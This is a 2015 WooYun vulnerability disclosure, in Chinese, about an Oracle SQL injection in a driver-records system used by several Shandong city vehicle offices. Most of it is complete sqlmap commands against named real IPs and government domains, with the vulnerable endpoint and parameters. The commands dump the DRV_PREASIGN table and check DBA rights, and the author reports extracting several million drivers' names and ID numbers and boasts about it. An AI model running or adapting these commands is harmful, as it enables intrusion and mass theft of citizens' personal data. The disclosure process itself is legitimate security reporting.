当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127456

漏洞标题:某省车管所多站通用管理系统存在oracle注入(打包)可泄露大约1000W左右数据包括驾驶员姓名/身份证号/驾驶车辆类型/牌照信息等

相关厂商:某省车管所

漏洞作者: 路人甲

提交时间:2015-07-19 10:50

修复时间:2015-09-06 00:00

公开时间:2015-09-06 00:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-19: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已经确认,细节仅向厂商公开
2015-07-30: 细节向核心白帽子及相关领域专家公开
2015-08-09: 细节向普通白帽子公开
2015-08-19: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

某省车管所通用管理系统存在oracle注入 可泄露全省驾驶员信息 破千万数据 包括驾驶员姓名/身份证号/驾驶车辆类型/牌照信息。。。。但在案例中并没有展示牌照信息
1000W偶1000W 平生第一次见这么多数据。。。。给个首页把
让我迎来人生中第一次首页吧 如何

详细说明:

济南市车管所:

sqlmap -u http://123.233.240.70:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --dump -T DRV_PREASIGN -D DRV_ADMIN


数据.png


sqlmap -u http://123.233.240.70:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --is-dba


权限.png


数据条数:824116 82W
东营市车管所:

sqlmap -u http://www.dygajj.gov.cn:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --dump -T DRV_PREASIGN -D DRV_ADMIN


数据.jpg


sqlmap -u http://www.dygajj.gov.cn:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --is-dba


权限.png


数据条数:171964 17W
青岛市车管所:

sqlmap -u http://cgs.qdpolice.gov.cn:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --dump -T DRV_PREASIGN -D DRV_ADMIN


数据.png


sqlmap -u http://cgs.qdpolice.gov.cn:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --is-dba


权限.jpg


数据条数 : 1752918 175W
淄博市车管所:淄博市的太卡了。。。故放弃
枣庄市车管所:

sqlmap -u http://218.59.228.162:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --dump -T DRV_PREASIGN -D DRV_ADMIN --dbms=oracle


shuju.png


sqlmap -u http://218.59.228.162:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --is-dba


QQ图片20150717232032.png


数据条数:318081 31W
烟台市车管所:压根就打不开。故放弃
潍坊市车管所:

sqlmap -u http://www.wfcgs.com:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --dump -T DRV_PREASIGN -D DRV_ADMIN --dbms=oracle


1.png


sqlmap -u http://www.wfcgs.com:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --is-dba


QQ图片20150717232820.jpg


数据条数:719692 71W
济宁市:

sqlmap -u http://60.211.179.22:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --dump -T DRV_PREASIGN -D DRV_ADMIN --dbms=oracle


QQ图片20150717233202.png


sqlmap -u http://60.211.179.22:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --is-dba


权限.png


数据条数:423416 42W
泰安市:

sqlmap -u http://60.213.185.51:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --dump -T DRV_PREASIGN -D DRV_ADMIN --dbms=oracle


数据库的结构不一样,懒得再找数据了

sqlmap -u http://60.213.185.51:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --is-dba


(⊙o⊙)… 这个也不是DBA 放弃
威海:

sqlmap -u http://221.2.145.164:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --dump -T DRV_PREASIGN -D DRV_ADMIN --dbms=oracle


QQ图片20150717234042.png


sqlmap -u http://221.2.145.164:9080/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --is-dba


1.png


数据条数:289770 29W
聊城市:

sqlmap -u http://218.56.165.82/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --dump -T DRV_PREASIGN -D DRV_ADMIN --dbms=oracle


1.png


sqlmap -u http://218.56.165.82/qsksyy/ywblcx.do --data "sfzmmc=A&sfzmhm1=1&ywlx=B&type=findywblcx&state=" --is-dba


2.png


数据条数:503713 50W
日照市,德州市,等余下城市因时间有限,未进行测试,请自查。。。
数据条数总计:5003670约500W 加上余下城市破千万应该没问题
1000W偶1000W 平生第一次见这么多数据

漏洞证明:

同上

修复方案:

不知道

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-20 10:27

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无